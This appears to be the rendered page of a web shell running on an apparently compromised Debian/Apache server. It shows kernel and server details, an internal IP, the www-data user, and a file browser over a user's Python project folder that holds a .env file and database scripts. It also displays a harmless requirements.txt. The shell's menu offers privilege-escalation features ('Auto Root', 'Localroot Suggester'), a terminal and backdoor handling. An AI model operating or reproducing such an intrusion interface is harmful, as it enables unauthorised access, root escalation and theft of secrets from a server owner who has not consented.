Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
otto /
python /
Delete
Unzip
Name
Size
Permission
Date
Action
app
[ DIR ]
drwxr-xr-x
2025-09-06 08:13
.env
479
B
-rw-r--r--
2025-09-06 08:13
.htaccess
44
B
-rw-r--r--
2025-09-06 08:13
check-ssl.py
1.36
KB
-rw-r--r--
2025-09-06 08:13
config.py
5.72
KB
-rw-r--r--
2025-09-06 08:13
db-bck.py
4.52
KB
-rw-r--r--
2025-09-06 08:13
db-transfer.py
3.94
KB
-rw-r--r--
2025-09-06 08:13
env.example
5.5
KB
-rw-r--r--
2025-09-06 08:13
requirements.txt
1.68
KB
-rw-r--r--
2025-09-06 08:13
send-mail.py
1.3
KB
-rw-r--r--
2025-09-06 08:13
server-checks.py
2.93
KB
-rw-r--r--
2025-09-06 08:13
Save
Rename
# Python Dependencies for IGA Core Symfony Application # Generated requirements.txt for Python services and utilities # Core Python packages (usually included with Python 3.6+) # These are listed for reference but typically don't need installation # pathlib - included in Python 3.4+ # typing - included in Python 3.5+ # logging - included in Python standard library # smtplib - included in Python standard library # ssl - included in Python standard library # email - included in Python standard library # os - included in Python standard library # re - included in Python standard library # External dependencies that may need installation psutil>=5.9.0 # Required for server monitoring (CPU, memory, disk usage) # Development and testing tools (optional) pytest>=7.0.0 pytest-cov>=4.0.0 black>=23.0.0 flake8>=6.0.0 mypy>=1.0.0 # Additional utilities that might be useful for the project requests>=2.31.0 python-dotenv>=1.0.0 # Required for .env file support PyYAML>=6.0 click>=8.1.0 # Database utilities (if needed for database operations) pymongo>=4.0.0 mysql-connector-python>=8.0.0 psycopg2-binary>=2.9.0 # File handling and utilities python-magic>=0.4.0 Pillow>=10.0.0 # Date and time handling python-dateutil>=2.8.0 pytz>=2023.3 # Configuration and environment management configparser>=5.3.0 argparse>=1.4.0 # Logging and monitoring structlog>=23.0.0 # Security and encryption cryptography>=41.0.0 # Web and API utilities (if needed) fastapi>=0.100.0 uvicorn>=0.23.0 httpx>=0.24.0 # Data processing (if needed) pandas>=2.0.0 numpy>=1.24.0 # Note: The mail service currently only uses Python standard library modules # Additional packages above are included for potential future use and development